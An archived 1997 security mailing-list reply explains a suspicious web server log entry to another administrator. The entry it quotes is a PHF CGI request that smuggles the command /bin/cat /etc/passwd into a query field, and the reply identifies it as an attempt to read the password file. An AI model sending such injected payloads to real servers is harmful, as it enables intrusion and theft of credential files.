[5120] in WWW Security List Archive
Re: What's this ?
daemon@ATHENA.MIT.EDU (Peter Gregory)
Wed Apr 16 18:32:47 1997
Date: Wed, 16 Apr 1997 12:49:31 -0700
From: peter.gregory-unix@mccaw-stg.com (Peter Gregory)
To: www-security@ns2.rutgers.edu, kaoc@hep3.phys.sinica.edu.tw
Errors-To: owner-www-security@ns2.rutgers.edu
> What does it mean ? if you find such messages in your access_log..
> ps. my httpd is the NCSA version.
>
> ip014.dialup.ntu.edu.tw - - [30/Jan/1997:18:50:58 +0800] "GET
/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 644
You've been hacked. Someone tried (and was perhaps successful) to get
your passwd file.
-pg
--
Peter Gregory [NICname PG11] peter.gregory@attws.com
IT Manager, AT&T Wireless Services, Strategic Technologies Group
